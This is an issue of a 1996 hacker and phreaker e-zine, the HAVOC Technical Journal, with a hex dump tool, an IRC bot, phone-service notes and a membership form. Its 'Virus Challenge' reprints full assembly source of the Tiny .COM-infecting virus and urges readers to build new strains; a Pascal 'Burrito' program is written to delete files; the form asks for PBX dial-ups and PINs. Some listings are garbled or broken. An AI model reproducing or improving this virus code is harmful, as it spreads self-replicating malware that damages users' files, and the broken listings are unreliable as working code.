The HAVOC Technicl Journal

Vol. 1 | No.5 | October 31st, 1996 | A HAVOC Bell Systems Publication

"Pleading the Fifth"

Happy Halloween!


Inside this issue:
Whats new this issue..............................
Editorial.........................................Scud-O
The Dumper........................................Scud-O
Virus Challenge...................................Scud-O / 40HEX
The Burrito Virus.................................Scud-O
BOT.C.............................................|\|\cFill
ANI Spoofing......................................Keystroke
Sign Up Sheet for HAVOC Bell Systems..............
X11 services......................................Scud-O
RTFM: The lamer Journal...........................
ROLL CALL & more!.................................
Next Month........................................

(I need more writers!!! e-mail me if ya want to write an article! my e-mail is: FoxMulder@worldnet.att.net the mags e-mail is: thtj@juno.com (wheee.. we get to read ads as we get your e-mail!) ) This months music supplied by: Geggy Tah, TOOL, Korn Sublime, Violent Femmes, Fun Loving Criminals and WHFS 99.1 !

What's new in this issue:

Back to the top
Well not much is new.. Yea Right! Both |\|\cFill and Keystroke
have joined HBS and they have both have articles in this issue.
Enjoy for they are great people!

How to contact us:

Check Out Our Web Site: www.geocities.com/siliconvalley/8805/
my (Scud-O) e-mail is : FoxMulder@worldnet.att.net
Psycho's lame email: CLASSIFIED
|\|\cFill's email : CLASSIFIED
Keystroke's email : CLASSIFIED
(If you guys want your email unclassified tell me so! )
our Mag e-mail is : thtj@juno.com
HELLCORE's e-mail is : hellcore@juno.com

Editorial:

by Scud-O
Back to the top
Well HBS is really taking off again. After not seeing Pinky for a while and Rotten & Sid's move I was worried that HBS would die. But |\|\cFill and Keystroke (who are VERY cool people) have joined up! They each did an article for this issue and next month we will have info sheets on them.

Also coming soon is a redesigned HBS web site! The graphics are almost done, the 403 Forbideen club is being worked on, the members pages will be created, and the links page will be up! Look for both Frames and non frames pages and maybe some Java & JavaScript! I may be moving to L0pht soon so then we will have CGI too!

In other news HBS is now into commercial & private Web Development! So if you need any web stuff done cheaply we will do it! (we have super low rates!) Check out our web page for more info up soon including the rates!

Now on to the bickering:
This has been a CRAZY month! new HBS memebers, me running my schools network, coming in on weekends to work on it more! it TOO much! so that is why this issue has been cut down in size and why next issue isn't coming out until the 15th of December! If you want to complain.. #$^%$@# you! It takes a HELL of a LOT of work to run a web site, run a network, connect that network to inet, and edit this magizine as well as write it up! so help by writting articles for me!!!

    ----------------------------------------------
  /       ---/   --/  /   /  |  /------/   /    /
 /---       /-----/------/-----/      /   /    /
/----------/                         /--------/
              -of HAVOC Bell Systems-
FoxMulder@worldnet.att.net

the National Get A Gat! [tm] Program - Join it today!

"Beliefs are dangerous. Beliefs allow the mind to stop functioning.
A non-functioning mind is clinically dead. Believe in nothing"
                                        -Tool "AEnima"

The Dumper:

by Scud-O
Back to the top
This is a HEX Dump utility I wrote which can really help you in virus writing
It is VERY simple but it works.. if you want more of a Dumper go find one..
they are out there.. ALSO: if you fix this Dumper send me a copy of the fix
and the source, I'll put it in a future issue! Below is the C source... its
about 8563 bytes the assembly version was only 1294 bytes but it was too much
typing to finish for this issue (ASM: 436 C:77 Winner:C!)
/*  DUMP.C    Display the binary contents of a file in
              hex and ASCII on the standard output device.

    Compile: C> CL DUMP.C or whatever your compiler is..

    Usage:   C>DUMP unit:path\filename.ext

    Copyright (C) 1996 HAVOC Bell Systems ALL Rights F**ked!
    Written by Scud-O of HBS
*/

#include 
#include 
#include 

#define REC_SIZE 16   /* input file record size  */

main (int argc, char *argv[])
{
        int fd;                 /* input file handle */
        int status = 0;         /* status from file read */
        long fileptr = OL;      /* current file byte offset */
        char filebuf[REC_SIZE]; /* data from file */

        /* abort if missing filename */
        if argc != 2)
        {
                fprintf(stderr, "\nDumper: wrong number of parameters\n");
                exit(1);
        }

        /* open file in binary mode, abort if fails */
        if((fd = open(argv[1],O_RDONLY | O_BINARY) ) == -1)
        {
          fprintf(stderr, "\nDumper: can't find file %s \n", argv[1]);
        /*  read and dump records until EOF */
        while((status = read(rd,filebuf,REC_SIZE) ) != 0)
        {
                dump_rec(filebuf, fileptr, status);
                fileptr += REC_SIZE;
        }

        close(fd);      /* close the input file */
        exit(0);        /* return the success code */
}
/* Display record (16 bytes) in hex and ASCII on standard output */
dump_rec(char *filebuf, long fileptr, int length)
{
        int i; /* index to current record */

        if(fileptr % 128 == 0) /* display heading if needed */
                printf("\n\n    0 1 2 3 4 5 6 7 8 9 A B C D E F");

        printf("\n%041X ", fileptr); /* display file offset */

        /* display hex equivalent of each byte from file */
        for(i=0; i < length ; i++)
                printf(" %02X", (unsigned char)filebuf[i]);

        if(length != 16)        /* spaces if partial record */
                for(i=0; i<(16-length); i++)
                        printf("   ");

        /* display ASCII equivalent of each byte from file */
        printf("   ");
        for(i=0;i 126)
                        putchar('.');
                else putchar(filebuf[i]);
        }
}

Virus Challenge:

by Scud-O / 40Hex
Back to the top
Okay people this article was originally in 40Hex Issue 1. This
is reprinted because It gives you a challenge to inprove this virus
so go a head and work on it! It will greatly help your virus writing
skills.

- VIRUS SPOTLIGHT -

The first virus I would like to spotlight is the Tiny virus, lets see
what our good friend Patti Hoffman (bitch) has written about it.
Name: Tiny
Aliases: 163 COM Virus, Tiny 163 Virus, Kennedy-163
V Status: Rare
Discovery: June, 1990
Symptoms: COMMAND.COM & .COM file growth
Origin: Denmark
Eff Length: 163 Bytes
Type Code: PNCK - Parasitic Non-Resident .COM Infector
Detection Method: ViruScan V64+, VirexPC, F-Prot 1.12+, NAV, IBM Scan 2.00+
Removal Instructions: Scan/D, F-Prot 1.12+, or Delete infected files
General Comments:
The 163 COM Virus, or Tiny Virus, was isolated by Fridrik Skulason
of Iceland in June 1990. This virus is a non-resident generic
.COM file infector, and it will infect COMMAND.COM.

The first time a file infected with the 163 COM Virus is executed,
the virus will attempt to infect the first .COM file in the
current directory. On bootable diskettes, this file will normally
be COMMAND.COM. After the first .COM file is infected,each time
an infected program is executed another .COM file will attempt to
be infected. Files are infected only if their original length is
greater than approximately 1K bytes.

Infected .COM files will increase in length by 163 bytes, and have
date/time stamps in the directory changed to the date/time the
infection occurred. Infected files will also always end with this
hex string: '2A2E434F4D00'.

This virus currently does nothing but replicate, and is the
smallest MS-DOS virus known as of its isolation date.

The Tiny Virus may or may not be related to the Tiny Family.
^like she'd know the difference!

OK, Theres the run down on the smallest MS-DOS virus known to man. As for
it being detected by SCAN we'll see about that.

Here is a dissasembly of the virus, It can be assembled under Turbo Assembler
or MASM.

PAGE  59,132


data_2e         equ     1ABh                    ;start of virus

seg_a           segment byte public             ;
                assume  cs:seg_a, ds:seg_a      ;assume cs, ds - code


                org     100h                    ;orgin of all COM files
s               proc    far

start:
                jmp     loc_1                   ;jump to virus


;this is a replacement for an infected file

                db      0CDh, 20h, 7, 8, 9      ;int 20h
                                                ;pop es

loc_1:
                call    sub_1                   ;



s               endp


sub_1           proc    near                    ;
                pop     si                      ;locate all virus code via
                sub     si,10Bh                 ;si, cause all offsets will
                mov     bp,data_1[si]           ;change when virus infects
                add     bp,103h                 ;a COM file
                lea     dx,[si+1A2h]            ;offset of '*.COM',0 - via SI
                xor     cx,cx                   ;clear cx - find only normal
                                                ;attributes
                mov     ah,4Eh                  ;find first file
loc_2:
                int     21h                     ;

                jc      loc_6                   ;no files found? then quit
                mov     dx,9Eh                  ;offset of filename found
                mov     ax,3D02h                ;open file for read/write access
                int     21h                     ;

                mov     bx,ax                   ;save handle into bx
                mov     ah,3Fh                  ;read from file
                lea     dx,[si+1A8h]            ;offset of save buffer
                mov     di,dx                   ;
                mov     cx,3                    ;read three bytes
                int     21h                     ;
                
                cmp     byte ptr [di],0E9h      ;compare buffer to virus id
                                                ;string
                je      loc_4                   ;
loc_3:
                mov     ah,4Fh                  ;find the next file
                jmp     short loc_2             ;and test it
loc_4:
                mov     dx,[di+1]               ;lsh of offset
                mov     data_1[si],dx           ;
                xor     cx,cx                   ;msh of offset
                mov     ax,4200h                ;set the file pointer
                int     21h                     ;

                mov     dx,di                   ;buffer to save read
                mov     cx,2                    ;read two bytes
                mov     ah,3Fh                  ;read from file
                int     21h                     ;

                cmp     word ptr [di],807h      ;compare buffer to virus id
                je      loc_3                   ;same? then find another file

;heres where we infect a file

                xor     dx,dx                   ;set file pointer
                xor     cx,cx                   ;ditto
                mov     ax,4202h                ;set file pointer
                int     21h                     ;

                cmp     dx,0                    ;returns msh
                jne     loc_3                   ;not the same? find another file
                cmp     ah,0FEh                 ;lsh = 254???
                jae     loc_3                   ;if more or equal find another file

                mov     ds:data_2e[si],ax       ;point to data
                mov     ah,40h                  ;write to file
                lea     dx,[si+105h]            ;segment:offset of write buffer
                mov     cx,0A3h                 ;write 163 bytes
                int     21h                     ;

                jc      loc_5                   ;error? then quit
                mov     ax,4200h                ;set file pointer
                xor     cx,cx                   ;to the top of the file
                mov     dx,1                    ;
                int     21h                     ;

                mov     ah,40h                  ;write to file
                lea     dx,[si+1ABh]            ;offset of jump to virus code
                mov     cx,2                    ;two bytes
                int     21h                     ;

;now close the file

loc_5:
                mov     ah,3Eh                  ;close file
                int     21h                     ;

loc_6:
                jmp     bp                      ;jump to original file

data_1          dw      0                       ;
                db      '*.COM',0               ;wild card search string


sub_1           endp
seg_a           ends
                end     start


Its good to start off with a simple example like this. As you can see what the virus does is use the DOS 4Eh function to find the firsy COM file in the directory. If no files are found the program exits. If a file is found it compares the virus id string (the virus jump instruction) to the first two bytes of the COM file. If they match the program terminates. If they don't match the virus will infect the file. Using two key MS-DOS functions to infect.
The first -
INT 21h Function 42h
SET FILE POINTER

AH = 42h
AL = method code
BX = file handle
CX = most significant half to offset
DX = least " "

If there is an error in executing this function the carry flag will be set, and AX will contian the error code. If no error is encountered
DX = most significant half of file pointer
AX = least " "

The second (and most) important function used by any virus is

INT 21h Function 40h
WRITE TO FILE OR DEVICE

AH = 40h
BX = handle
CX = number of bytes to write
DS:DX = segment of buffer

Returns

AX = bytes transferred

on error
AX = Error Code and flag is set.
An example of Function 40h is ----

     mov     ah,40h                   ;set function
     mov     bx,handle                ;load bx with handle from prev open
     mov     cx,virus_size            ;load cx with # of bytes to write
     mov     dx,offset write_buffer   ;load dx with the offset of what to
                                      ;write to file
     int     21h                      ;

This function is used by 98% of all MS-DOS viruses to copy itself to a victim file.
Now heres a sample project - create a new strain of Tiny, have it restore the original date and time etc...
HR

The Burrito Virus:

by Scud-O
Back to the top
This is a joke virus just like the Cookie virus. It says that it wants a burrito, if you type 'burrito' it exits. Type 'breakfast burrito' and the virus deletes itself. type 'taco bell burrito' and the virus kills a random file (EXE). Actually this virus isn't really a true virus, as it doesnt spread (hmm.. maybe for version 2... ) anyway I wrote this is PASCAL basically because I was bored in PASCAL class. I'm going to port this to ASM as soon as i find the time... (hey im a busy guy alright?!?!) currently this file is like 4000 or so bytes (give or take..) PLEASE NOTE: This is a VERY early version of the virus! The final is lost somewhere on my network at school... I will hopefully find it for next issue! Challenge: get this porgram to work fully! I will give a prize to whoever fixes it first!


PROGRAM burrito (Input,Output,InfectedFile);
USES dos;

(*CONST
     ThisFile = 'win.com';*)

VAR
   regs: Registers;
   DirInfo: SearchRec;
   InfectedFile : Text;
   KillFile,
   ThisFile,
   UsrInput : String;

BEGIN
     ThisFile := 'win.com' ;
     Write('I want a burrito! ');
     ReadLn(UsrInput);
     If UsrInput = 'burrito'
     Then
         Begin
         End ;
     If UsrInput = 'breakfast burrito'
     Then
         Begin
              WriteLn('Yuck');
                 regs.ah := $41;
                     with regs do
                     msdos(regs);
                     with regs do
                          begin
                               str(dx, ThisFile);
                          end;
         End;
     If UsrInput = 'taco bell burrito'
     Then
         Begin
               KillFile := FindFirst('*.EXE', Archive, DirInfo);
               begin
                     regs.ah := $41;
                     with regs do
                     msdos(regs);
                     with regs do
                          begin
                               str(dx , KillFile);

                          end;
               end;
         End;

end.

A simple C bot by |\|\cFill:

Back to the top
/*
 * bot.c - example of IRC automaton
 *
 * invoke with "irc -e bot"
 *
 * TnG - //\/\cFiLL
 * repo
 */
 
#include 
#include     
#include "varargs.h"
 
#define LOGFILE "bot.log"
#define MAXLEN 270
#define MAXARGS 135
#define PUBLIC  0x01
#define PRIVATE 0x02
#define NOTICE  0x04
#define DCCCHAT 0x08
 
char *strchr(char *str, int ch);
 
void init(void);
void strip(char *str);
int makeargs(char *str, char **av);
void parse(int ac, char **av);
void say();
 
int
main()
{
	FILE *log;
	char *buf, **av;
	int ac;
 
	buf = (char *) malloc(sizeof(char) * MAXLEN);
	av = (char **) malloc(sizeof(char **) * MAXARGS);
	if(!(log = fopen(LOGFILE, "a"))) {
		perror(LOGFILE);
		exit(1);
	}
	while(fgets(buf, MAXLEN, stdin)) {
		strip(buf);
		fprintf(log, "%s\n", buf);
		fflush(log);
		ac = makeargs(buf, av);
		parse(ac, av);
		fflush(stdout);
	}
	fclose(log);
	free(av);
	free(buf);
	exit(0);
}
 
void init(void)
{
	puts("/join #home");
	puts("/notify SigInt");
}
 
void
strip(char *str)
{
	char *t;
 
	if(t = strchr(str, '\n'))       *t = 0;
	if(t = strchr(str, '\r'))       *t = 0;
	if(t = strchr(str, '\\'))       *t = 0;
	if(t = strchr(str, ';'))        *t = 0;
}
 
int
makeargs(char *str, char **av)
{
	char *t = str;
	int ac = 0;
 
	while(*t) {
		if(ac < MAXARGS) av[ac++] = t;
		while(*t && *t != ' ') t++;
		if(*t) *t++ = 0;
		while(*t && *t == ' ') t++;
	}
	return(ac);
}
 
void pargs(int ac, char **av)
{
	int i;
 
	for(i = 0; i < ac; i++)
		printf("%s ", av[i]);
	printf("\n");
}
 
void say(va_alist) va_dcl
{
	va_list args;
	char *from, *fmt;
	int flags;
 
	va_start(args);
	flags = va_arg(args, int);
	from = va_arg(args, char *);
	fmt = va_arg(args, char *);
 
	/* parse flags */
 
	if(flags & PUBLIC)
		vprintf(fmt, args);
	if(flags & PRIVATE) {
		printf("/msg %s ", from);
		vprintf(fmt, args);
	}
	if(flags & NOTICE) {
		printf("/notice %s ", from);
		vprintf(fmt, args);
	}
	if(flags & DCCCHAT) {
		printf("/msg =%s ", from);
		vprintf(fmt, args);
	}
	va_end(args);
}
 
void parse(int ac, char **av)
{
#define public() flags = PUBLIC
#define private() flags = PRIVATE
#define notice() flags = NOTICE
#define dccchat() flags = DCCCHAT
#define match(x,y) (!strcmp((x),(y)))
 
	static char nick[9], from[9], master[9], chnl[11];
	char *first, *last, *cmd, *second;
	int client = 0, trusted = 0, flags = PUBLIC;
 
	strcpy(nick, "SigBot");
 
	/* determine type of input */
 
	first = av[0];
   second = av[2];
   last = first + strlen(first) - 1;
	cmd = av[1];
 
	/* set flags based on input */
 
	if(*first == '<' && *last == '>') public();
	else if(*first == '*' && av[0][1] != '*' && *last == '*') private();
	else if(*first == '-' && *last == '-') notice();
	else if(*first == '=' && *last == '=') dccchat();
	else client++;
 
	*last = 0;
	strncpy(from, first + 1, 8);
   if(match(from, "SigInt")) trusted++;
 
	/* begin parsing bot's input */
 
	if(client) {
		if(match(av[4], "channels.")) {
			strcpy(chnl, "#home");
			init();
		}
		else if(match(av[1], "You") && match(av[4], "kicked")) {
			printf("/join %s\n", chnl);
			sleep(1);
			printf("%s, you bastard!!!\n", av[9]);
		}
		else if(match(cmd, "DCC") && match(av[2], "CHAT"))
			printf("/dcc chat %s\n", av[7]);
		else if(match(cmd, "DCC") && match(av[2], "SEND")) {
			private();
			say(flags, av[7], "Sorry, %s, I don't do DCC :(\n", av[7]);
		}
		else if(match(av[2], "invites")) {
			strcpy(chnl, av[6]);
			printf("/join %s\n", chnl);
			printf("/msg %s thanks!\n", av[1]);
		}
		else if(match(av[3], "joined") && strcmp(av[1], nick)) {
			if(match(av[1], "SigInt"))
				printf("/mode %s +o SigInt\n", chnl);
		}
		else if(match(av[1], "Signon")) {
			strcpy(from, av[3]);
			private();
			say(flags, from, "hi %s!\n", av[3]);
			printf("/msg SigInt %s is here!\n", av[3]);
		}
		else if(match(cmd, "Signoff")) 
			printf("/msg SigInt %s has left!\n", av[3]);
		return;
	}
 
	/* parse public, private, notice, and dccchat messages */
 
	if(match(cmd, "die") && trusted) puts("/sign Bad breath?");
	else if(match(cmd, "do") && trusted) pargs(ac - 2, av + 2);
	else if(match(cmd, "finger")) printf("/exec -out finger %s\n", av[2]);
	else if(match(cmd, "go") && trusted) {
		strcpy(chnl, av[2]);
		printf("/join %s\n", chnl);
	}
	else if(match(cmd, "nick") && trusted) printf("/nick %s\n", av[2]);
	else if(match(cmd, "op") && trusted) printf("/mode %s +o %s\n", chnl, av[2]);
	else if(match(cmd, "ping")) say(flags, from, "pong.\n");
	else if(match(cmd, "sextalk")) printf("/exec -out SexTalk\n");
   else if(!strcasecmp(cmd, "What"))  
      printf("I don't know, that's a good question %s\n", from);
   else if(!strcasecmp(cmd, "Why"))
      printf("yeah, why?\n");
   else if(!strcasecmp(cmd, "How"))
      printf("%s, doing so is pretty impossible, unless you're a bot!\n", from);
   else if(!strcasecmp(cmd, "elite"))
      printf("very elite\n"); 
   else if(!strcasecmp(cmd, "re"))
      printf("re %s\n", second);
	     
      
      
}

ANI Spoofing by Keystroke

Back to the top
(this was first published in PLA issue 41. (thats why he's the mad little PLA (Phone Losers of America) Insider!!))
Dear PLA:
I've found a new way to block 800 ANI. It is called Net2Phone and allows
people to place calls using a piece software which connects to IDT's (the
company offering Net2Phone) servers and routes the call from their fones in
New Jersey to wherever you want to call.

Here is how they describe it, "Net2Phone enables Internet users with sound
equipped PCs to initiate calls from their computers and transmit them over the
Internet to IDT's phone switches. The switches then convert the signal from
the 'packet switch network' Internet environment to the 'circuit switch
network' telephone environment. And then to its' final destination - any
ordinary telephone. The result is real-time uninterrupted voice communication
between the two calling parties."

This service is offered for free on 800 and 888 numbers. If you want to call
regular numbers it cost's extra. Unfortunately, after you call the number, you
cannot send tones and it is too staticky to use a tone dialer. Grab a copy at
http://www.net2phone.com.

Keystroke - prenzo@soho.ios.com

The HAVOC Bell Systems Sign Up sheet:

Back to the top
(NOTE: im not real sure why im doing this, Its usually invite only , but i dunno, sign this and maybe you can get in... )
           Application For Membership To HAVOC Bell Systems

    HAVOC Bell Systems is quickly coming on to the net and irc.
    (we'd be on HellNet[tm] if Scud-O EVER gets his own line!!)
    We are a serious group of Phreakers/Hackers/ and Virus Writers.
    We are all over the globe so.. a group meeting is pretty unlikely.

    If you wish to apply for membership to HBS or if you want
    your board to become to become a HBS distribution site
    fill out the application below and upload to Scud-O at:
    FoxMulder@worldnet.att.net
    for the Subject put: HAVOC Bell Systems Sign Up Sheet
    (anything else will not be reviewed!)
   
    Keep in mind, from the start of HAVOC Bell Systems we have been
    mainly Phreakers, but we are now into hacking and viruses.
    We do this to fight for phreaker's rights and to fight the
    Ma Bell beast.

------------------------------------------------------------------------------

                       Application For Membership


  I am interested in becoming

  ___ A HAVOC Bell Systems (HBS) Member
  ___ An HBS  Distribution Site Sysop


  Handle:      ________________
  Aliases:     ________________
  Email :      ________________

  Are you in any other groups? List them
  _____________________________________
  _____________________________________
  _____________________________________

  What are you into? (Hacking/Phreaking/Virus/Etc.. )
  ________________________________________________________________
  What do you know?
  ________________________________________________________________
  ________________________________________________________________
  ________________________________________________________________
  ________________________________________________________________

  Do you know any programming languages? (C/PASCAL/ASM)
  ____________________________ (Know well)
  ____________________________  ...
  ____________________________ (Just messed with)


  Are you a sysop of a BBS?  ___
  If yes leave the vitals:
                           BBS Name: _________________________
                           Dialup:   _________________________
                           State/Country: ____________________
                           Running: example: PCBoard _________

  Do you have a web site? ___
  vitals:
     Address: _________________________________________________
     CGI access : ______ (Y or N)
     Storage space: __________MB

  List three people you know (handles) : _________________
                                         _________________
                                         _________________

  List what IRC channels you are on:
  Channel: ____________________
  Server:______________________ (ex. Undernet, Dalnet, etc)
  Do you have ops on this channel? ___ (Y/N)

  List a BBS that you have 'elite' access to:

  Name: _____________________   Dialup: _______________________
  Sysop: ____________________   NUP: __________________________

  Do you have a VMB:
  Dialup: _________________ Box#: _________

  Quiz:
  1. What is a PBX? __________________________________________
  2. What is a PBX dial up # :________________________________
                        PIN  :________________________________
  3. What is a Bot? __________________________________________
  Are you in any way connected to and law enforcment agency? ___
  (NOTE: by law you MUST answer this truthfully! )
  Do you realize that being untruthfull to the above question
  waviers all legal matters: ____
  Are you in anyway connected to any software company? ___


  Thank for filling this out. -The HAVOC Bell Systems gang-

     Please email this application to Scud-O at: FoxMulder@worldnet.att.net
     for the Subject put: HAVOC Bell Systems Sign Up Sheet
     (anything else will not be reviewed!)

X11 Services: by Scud-O

Back to the top
011 : Used for international dialing
111 : No use
211 : No Use
311 : Disconnect phone temporally ( In Baltimore it is for non emergency Five-O service )
411 : Information ( So whats the 411? )
511 : No Use
611 : Repairs
711 : No Use
811 : No Use
911 : Emergency ( Rescue911 )
NOTE: This was tested in the Baltimore Metro area, so other places this may be different!

RTFM: The Lamer Journal

Back to the top

What is RTFM : The Lamer Journal?

basically it is a monthly article teaching basics of stuff, which will continue until we feel we have covered what you need to know.

Next month will have a basics on the smarts you need to stay out in the world long enough to practice your hobby.

Each monthly installment has info and a quiz on the material, and info on where to get more info, practice sites, tools, etc.

Look for it starting with issue 6!

ROLL CALL & More!

Back to the top

Who is HAVOC Bell Systems?

Scud-O : Bunghole
Psycho : Burrito
|\|\cFill : Bot boy
Keystroke : PLA Insider
Pinky : In hidding
Rotten : Moving fool
Sid : Other Moving Fool (and the're twins as well! )
Want to join? check out the sign up sheet!

Cool People:

phire
UnaBomber
theLURK7R (sometimes theLURK3R ) or 4, 2 , etc...
LogicBox
Dem0nWeed
darkcyde
Rap3d_C0w
all on IRC!

This Month Question: Who is Scud-O?

Scud-O is from the cool as shit comic book Scud: The Dispossible Assassin by Rab Schrab and Fireman Press. In issue 2 there is a TV ad for the Scud line and there is a little gun that talks and his name is Scud-O. There was a cool theme song it was:
"Get your spite in a bag,
get your bile piled up,
its the best damn vengance you've ever had!"


Next Month's Question: Who are |\|\cFill and Keystroke?


Next Month:

Back to the top
This MAY be what we will have in issue 6
- The HellNet[tm] script / C code!
- Voice Mail Boxes
- PBX's
- Pager Talk (Delayed from this issue)
- NIDs pt.2 (Delayed from this issue)
- Whats up in the HELLCORE labs? (Delayed from this issue)
- Undernet Crash (Delayed from this issue)
- More from the RTFM: The Lamer Journal
- Much, Much more TBA!
Issue 6 is out Dec. 15th!

cya ya next issue! - The HAVOC Technical Journal Crew